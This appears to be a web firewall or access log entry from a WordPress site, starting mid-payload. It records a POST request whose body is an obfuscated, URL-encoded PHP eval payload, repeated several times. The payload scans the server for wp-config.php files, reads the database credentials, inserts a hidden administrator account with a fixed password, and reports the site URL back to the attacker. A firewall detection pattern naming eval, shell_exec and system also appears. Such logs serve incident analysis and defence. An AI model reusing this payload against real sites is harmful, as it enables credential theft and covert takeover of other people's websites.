28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 18:08:48","213.209.159.254","POST","\/wp-includes\/compat-utf8.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> fpVGge:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/compat-utf8.php HTTP\/1.1\ncontent-length:12663\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\nsec-fetch-site:none\nsec-ch-ua-mobile:?0\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-ch-ua-platform:\"Windows\"\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-user:?1\nsec-fetch-dest:document\n\nfpVGge=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20